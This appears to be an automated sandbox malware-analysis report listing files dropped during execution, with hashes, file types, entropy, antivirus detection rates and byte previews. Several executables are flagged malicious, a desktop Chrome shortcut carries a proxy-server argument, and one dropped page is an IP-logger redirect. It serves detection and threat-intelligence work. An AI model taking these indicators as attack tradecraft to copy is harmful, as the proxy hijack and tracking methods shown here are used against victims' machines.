SSDEEP:	1536:7qs5eJ4mXCDBtTfB3H8uBojRGpN4uE2aOnLTgcXSVX7eA+AB:7JwJzefT1oQ4uEqnLTgcXyu
MD5:	A59EE65875637FDF32A1309A4820CFB1
SHA1:	6E098D47FBA6DF1730911D87D3095B98709A753B
SHA-256:	2AAC3DAB14A971DA2770F20444E6D9B7E652D1F87A191ED5119D7AA228303730
SHA-512:	BE878F86BCBAFB9FF88B9C59CB800F70CE1E9A1E8C72BCCC38AE37BA979475C0E7925DC9E0081BFE73831A944CCAB36DFE95ECFFEF55BBDDEFA499839AD4B6F8
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... .......0..f....................................<...........$...Z9..........`.......8...........T...........P$..e\|......................................................................................................eJ......d.......GenuineIntel............T..............f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF25.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8318
Entropy (8bit):	3.6939589788298006
Encrypted:	false
SSDEEP:	192:R6l7wVeJGs636Y0h6INgmfM4Jrprx89bd+sfeT/m:R6lXJt636Yq6igmfM4JYd9fei
MD5:	71D46D905B276C901E8A93B72CA3BC65
SHA1:	BDE9A19FCF524F393021B0D96C43B4CCE0944690
SHA-256:	1F4099043584611C68C386AF317CACD6417FDD7588729BE35669C681AF33F243
SHA-512:	6809D9105598CD77A7DB2561A88C1429603DAD684360F8398DE4E829A8EC83F8F41F7C658042E6D622CA142886AD61C4A44996F3ED5D46889F2CEECD60CC7A07
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF55.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4652
Entropy (8bit):	4.479200904177539
Encrypted:	false
SSDEEP:	48:cvIwWl8zseJg77aI9TgWpW8VYEXYm8M4JlAFT+q8wEym3Z01RCd:uIjfUI7JZ7VBKJg4yAZ0TCd
MD5:	30F2852EC563949EC45756C9783DE389
SHA1:	3E1248FF134734EFFE674211E1DC3B3294763835
SHA-256:	C6C684B37D13DF6E4C63BD7C7023996E84DA8D1E23ACE6D60CA80E06C7DDECBA
SHA-512:	5862ACB730B2604A3E171B97D5C10D125245EF593DCA0169C7C868A7CA72BCF417317700AC29D4832C1A25AD1EB7C150C2DF7255F9AB3CDE23772DA599AAAED6
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="280604" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\wikombernizc\reakuqnanrkn.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2665984
Entropy (8bit):	6.546705490640015
Encrypted:	false
SSDEEP:	49152:UjBP3/qGrdNJ8VZFhY++Yk/4aLq8wH7mm6qJsSRRjyl:aBPvfrAZF28k/RLbwH7mvcRRjy
MD5:	FFADA57F998ED6A72B6BA2F072D2690A
SHA1:	6857B5F0C40A1CDB0411EB34AA9FE5029BCDB84F
SHA-256:	677F393462E24FB6DBA1A47B39E674F485450F91DEEE6076CCBAD9FD5E05BD12
SHA-512:	1DE77F83A89935BB3FC3772D5190C3827D76A998785D451E2C0D11A0061CFD28F1B96ECCB41B012C76DDDA2021E3333A0A647489AE3C6DAC10CFB8302ABDF33F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 83%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....e.........."...........(.....@..........@.............................0)...........`.....................................................<.....).......(.............. ).x...............................(.......8...........@...X............................text...V........................... ..`.rdata...".......$..................@..@.data.....'.......'.................@....pdata........(.......(.............@..@.00cfg........(.......(.............@..@.tls..........(.......(.............@....rsrc.........).......(.............@..@.reloc..x.... ).......(.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\Public\Desktop\Google Chrome.lnk

Download File

Process:	C:\Users\user\AppData\Roaming\configurationValue\propro.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Thu Oct 5 05:47:17 2023, atime=Wed Sep 27 08:36:54 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	3.467980015897966
Encrypted:	false
SSDEEP:	48:8Sjd5TvG90lRYrnvPdAKRkdAGdAKRFdAKR6P:8SXby7
MD5:	8CCC3FAF06B8EFDFBA96556270AAC68B
SHA1:	94F24B9C1C1B10AA21DACA96BB02B2DC1AA5EFBB
SHA-256:	939AEFDC2ADB994C3BB54D4711BA05BD421CFD6F8967E94EA7E32E4A9CD074CD
SHA-512:	7FC7EAB3AA80B10E11F32396F4D5BA0532155565B19598C0B11924BD32193CDE47F1E650D53F2BD7612C8827D389C9FB8BDDAD795B9BC77A9A785BCC1240DC1B
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ......,........W....X.&&... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....EW.3..PROGRA~1..t......O.IEW.5....B...............J.......j.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VEW@2....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.2..Chrome..>......CW.VEW.2....M.....................7...C.h.r.o.m.e.....`.1.....EW.2..APPLIC~1..H......CW.VEW.2..........................7...A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.L .chrome.exe..F......CW.VEW.5.........................l...c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\user\AppData\Local\0Tp94y9MBurxJFhItxZ95EWw.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 46%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\1YUCcdc2ns8K2t45poUN7Amx.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 46%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\2dRkzCtGWj8VKkanaZyDrBYJ.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 46%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\2pxZ3QGs5RsdEF32wezepFbS.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 46%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\33tIGBzVuCMQl3Wc6IvtNEjP.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\AppData\Local\3kkvcuaTSYv6zr1LL5n1fFGV.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5388160
Entropy (8bit):	6.884124424523157
Encrypted:	false
SSDEEP:	98304:e0NFR6666666666666666666666666666666x666666666666666fwwwwwwwwww2:LPMki6zio75L3pf3dedO4keCIwkoYbgW
MD5:	333A528A6EBC01B1A7A1C180E1A0957F
SHA1:	3AAE9BA00F30562DE05921548B9D45D5CAE11839
SHA-256:	0319CDCB32F4FD759AFE6821524C20E67E5A992B54453FC5BACF1CA43EF8A640
SHA-512:	DE69E68A3870C82EFB2776422B8A84A8A19583D0BE1FDBBA87D8E1413F46A46830B0DD176E85ABD867123B963BB3955BD251D212A9733BFE8161B492D7FE8E77
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...zL.f.........."......Z....M.....\|*............@..........................`R.....L.S...@.....................................P........{L...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....{L......\|L..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\3u6RrNmizX68IHHLss9QqKUE.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 46%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\6kv625NXRIyPYKeDaoPyctw3.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236343038158279
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3Nv:uIDymkE/MdGGnwsDEgGM8o1zwN9v
MD5:	DC66D8F64F9DE14A95471083A50D5188
SHA1:	E06B3F30A66DFBC6AEFEFE1C624C1A4C3D87971D
SHA-256:	529B02677E4645C0A5700FA22008E6BC122F13249CCBC4A2D70D2B359885EBCA
SHA-512:	731823870519B8F1854E8FA598A832F238D562FD6991625B50DFA3B166C80D985F0A5544B85F39357688FEDB631AEBE1DC8C8EFDB1A779C183A33DD177AA4C55
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 45%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\9xT7E5Pb81hXRamadrxhTcKa.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 46%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\A47mXAfrsBDpojX2UlRMyVjb.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236343038158279
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3Nv:uIDymkE/MdGGnwsDEgGM8o1zwN9v
MD5:	DC66D8F64F9DE14A95471083A50D5188
SHA1:	E06B3F30A66DFBC6AEFEFE1C624C1A4C3D87971D
SHA-256:	529B02677E4645C0A5700FA22008E6BC122F13249CCBC4A2D70D2B359885EBCA
SHA-512:	731823870519B8F1854E8FA598A832F238D562FD6991625B50DFA3B166C80D985F0A5544B85F39357688FEDB631AEBE1DC8C8EFDB1A779C183A33DD177AA4C55
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 45%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BD2oseXp7BCvMSmO4ZjO5L8H.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6132736
Entropy (8bit):	7.152487916364851
Encrypted:	false
SSDEEP:	98304:mkpa5UKdCrbpaah6k5u6yA6nE0w5jjvjjjjl5S/hdIOrd/ClFkydIy3rBld3:m3fdCxaah75uUSw5jjvjjjj3dOr5TLyF
MD5:	BE94B480184550913C269E35A13AD28C
SHA1:	57C2F9CBEB17F80A540A6AEAFDD61F28443418CE
SHA-256:	40E1C85ADECCCC0D02B09681A421BA0457962BFD1A035A5BD234EC13C55AD2F4
SHA-512:	CB52C1D8E9D820A352FE6CB1DE21C80BB55512230C8287DB6C80A2C958CA23ECEA38C80480DEEF2A0E9157EFFEAE12E9868428404ACAD19A6D6F983A822580E3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26% Antivirus: Virustotal, Detection: 34%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."....'............X.%........@.............................`p.....kJ^...`...................................................!.......n..K....m...............n...............................!.(................................................... .........p.................. ..` Fp...........t..............@..@ .............X..............@... .....P.......j..............@..@ .....P......................@..@.ZiZ....5K...`...L..................@..@ .!....!......B..............@..@.idata........!......P..............@....tls..........!......R...................themida..K..."...K..T..............`....@2\|..........m......TZ.............@..H.reloc........n......F[................@.rsrc....K....n..L...H[.............@..@........................................................................................

C:\Users\user\AppData\Local\EbkuLW0CG2HYrP9ej87UFUE5.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6132736
Entropy (8bit):	7.152487916364851
Encrypted:	false
SSDEEP:	98304:mkpa5UKdCrbpaah6k5u6yA6nE0w5jjvjjjjl5S/hdIOrd/ClFkydIy3rBld3:m3fdCxaah75uUSw5jjvjjjj3dOr5TLyF
MD5:	BE94B480184550913C269E35A13AD28C
SHA1:	57C2F9CBEB17F80A540A6AEAFDD61F28443418CE
SHA-256:	40E1C85ADECCCC0D02B09681A421BA0457962BFD1A035A5BD234EC13C55AD2F4
SHA-512:	CB52C1D8E9D820A352FE6CB1DE21C80BB55512230C8287DB6C80A2C958CA23ECEA38C80480DEEF2A0E9157EFFEAE12E9868428404ACAD19A6D6F983A822580E3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26% Antivirus: Virustotal, Detection: 34%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."....'............X.%........@.............................`p.....kJ^...`...................................................!.......n..K....m...............n...............................!.(................................................... .........p.................. ..` Fp...........t..............@..@ .............X..............@... .....P.......j..............@..@ .....P......................@..@.ZiZ....5K...`...L..................@..@ .!....!......B..............@..@.idata........!......P..............@....tls..........!......R...................themida..K..."...K..T..............`....@2\|..........m......TZ.............@..H.reloc........n......F[................@.rsrc....K....n..L...H[.............@..@........................................................................................

C:\Users\user\AppData\Local\Ee4C8pygmuP2wWmHYlaPNRsj.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5388160
Entropy (8bit):	6.88412459887609
Encrypted:	false
SSDEEP:	98304:N0NFR6666666666666666666666666666666x666666666666666fwwwwwwwwwwg:mPMki6zio75L3pf3dedO4keCIwkoYbgA
MD5:	475B97C77C10688DFEB843F324F44D20
SHA1:	C2419717DDF08FA92CF3E2FC05CEE8A9BAE337B6
SHA-256:	95C82517B54EF8E75F58C9AFF66A120E600F622BC73DD5A7BDE31C2F3CBCB05C
SHA-512:	33B74103F55E90E241ACC0BA508BFBE9728700AC97062D33CB81C280C332065CD1A59304C96B81E1947126CA4B1B62E98C51321DED8CF03C4FC8E88FDAC4384D
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...zL.f.........."......Z....M.....\|*............@..........................`R......wR...@.....................................P........{L...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....{L......\|L..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\EobcTZAHsg9TkKb6ZiDxOQpo.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:	dropped
Size (bytes):	3302400
Entropy (8bit):	7.983528152249971
Encrypted:	false
SSDEEP:	49152:fEOGfMr0UrM21zm6mVonU7JCGjh9FDrjop1jy50JtrD2sGxgLJ+r8+NSR63xrO0s:rtr0CnnGJCGl9GDnrNGaLJ5RKxy
MD5:	5C0D04CCD0CBCD8CC90A502DF8B512E7
SHA1:	0F905A137B801A69CF498FC0F8C5F00E75C5E689
SHA-256:	BC84C3A9CFEB083FE41A238C55EA3163B5C9E5103FEE0A7D7F4D8A1236B6D22D
SHA-512:	2D8D2630D4C362C67BC54BAD9B49DD0B11A5B9623CF106099B141E3FCF66D8032A3B855169BD636FEBFE517F0C8581DF62F70E77AF3C9CC7691AC407F7391D23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 46% Antivirus: Virustotal, Detection: 60%, Browse
Reputation:	unknown
